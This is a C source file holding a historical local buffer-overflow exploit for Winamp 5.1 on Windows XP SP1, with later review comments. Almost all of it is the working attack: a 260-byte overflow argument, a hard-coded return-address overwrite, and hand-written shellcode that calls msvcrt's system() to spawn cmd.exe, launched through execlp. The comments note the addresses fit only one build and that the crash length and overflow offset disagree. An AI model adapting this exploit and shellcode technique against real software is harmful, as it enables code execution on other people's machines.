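/*
 * Copyright (c) Rosiello Security
 * http://www.rosiello.org
 *
 * Winamp_5-1_ex.c (Windows XP Pro + SP1)
 *
 * ---[ @Wizard@ local Winamp v5.1 exploiter ]---
 *
 * In December of this year (2003) a good friend of mine, "b0f", reported
 * this bug in an advisory at www.b0f.net.
 *
 * (BUG:)
 * There is a simple buffer overflow in the argument-handling routine of
 * Winamp version 5.1. Just type:
 *
 *   C:\Progra~1\Winamp\winamp.exe AAAAAAAAA....[517 chars]...AAAAAAAAAAAA
 *
 * and winamp.exe will crash. This bug was never exploited, so that was my
 * quest.
 *
 * The shellcode requires system() from msvcrt.dll.
 *
 * AUTHOR : Johnny Mast
 * CONTACT: rave@rosiello.org
 *
 * NOTE(review): historical local proof-of-concept. Every address below is
 * hard-coded for one environment (Winamp 5.1 on Windows XP Pro SP1) and is
 * wrong anywhere else. As written it only spawns cmd.exe from the crashed
 * winamp.exe process; nothing in this listing crosses a privilege boundary.
 * The header names in the original listing's #include lines were lost in
 * extraction; they are restored here from the functions the code calls.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <process.h>   /* execlp() on Windows CRT */
#else
#include <unistd.h>    /* execlp() on POSIX */
#endif

/* Address of msvcrt!system on Windows XP Pro SP1: 0x77bf8044, little-endian. */
#define SYS_ADR "\x44\x80\xbf\x77"

/*
 * Saved-return-address overwrite: 0x0012d480, little-endian. A stack
 * address; presumably it lands in the NOP sled of the shellcode copied
 * onto the stack by the overflowing argument handler -- confirm under a
 * debugger before reusing on another build.
 *
 * NOTE: strcat() below stops at the first NUL, so only "\x80\xd4\x12" is
 * ever appended; the fourth (high, zero) byte comes from the string
 * terminator of the argv entry. The trailing "\x00\x00" here never reach
 * the target.
 */
#define EIP "\x80\xd4\x12\x00\x00"

/*
 * Payload: builds "cmd.exe " on the stack and calls system() through the
 * hard-coded msvcrt address. Contains no NUL byte, so it survives being
 * passed as an argv string.
 *
 * NOTE(review): the 4 bytes following "cmd.exe " are the pushed ebp value
 * (a stack address), not an explicit NUL. Since the stack address used
 * for EIP is of the form 0x0012xxxx, its high byte is 0x00, which appears
 * to be what terminates the string system() sees -- verify under a
 * debugger; it is not guaranteed by the code itself.
 */
char shellcode[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" /* 12-byte NOP sled */
    "\x8b\xec"             /* mov  ebp, esp                       */
    "\x55"                 /* push ebp                            */
    "\x68\x65\x78\x65\x20" /* push "exe "                         */
    "\x68\x63\x6d\x64\x2e" /* push "cmd."                         */
    "\x8d\x45\xf4"         /* lea  eax, [ebp-0xC]  -> "cmd.exe "  */
    "\x50"                 /* push eax                            */
    "\xb8" SYS_ADR         /* mov  eax, msvcrt!system             */
    "\xff\xd0";            /* call eax                            */

/*
 * Build the overflowing argument and exec the target.
 *
 * argv[0]/path : the Winamp binary (short 8.3 path, trailing space kept
 *                byte-for-byte from the original).
 * argv[1]      : 260 'A' bytes followed by the return-address bytes.
 * argv[2]      : the shellcode.
 *
 * On success this process is replaced by winamp.exe and main() does not
 * return. Returns EXIT_FAILURE only if the exec itself fails (the
 * original silently fell off the end of main in that case).
 */
int main(void)
{
    char target[1024 * 2] = "C:\\Progra~1\\Winamp\\winamp.exe ";
    char buffer[1024];

    /* Zero everything first so the argument is always NUL-terminated. */
    memset(buffer, 0x00, sizeof buffer);

    /*
     * Pad up to the overwrite offset.
     * NOTE(review): the advisory quoted above crashes with 517 characters,
     * but the offset used here is 260; the two are not reconciled in this
     * file -- verify the real offset under a debugger before reuse.
     */
    memset(buffer, 0x41, 260);

    /* Appends only the first 3 bytes of EIP (see the note at its #define). */
    strcat(buffer, EIP);

    /* Sentinel must be a null pointer, not the int 0, for a variadic call. */
    execlp(target, target, buffer, shellcode, (char *)NULL);

    /* Only reached when exec failed: report why instead of exiting quietly. */
    perror("execlp");
    return EXIT_FAILURE;
}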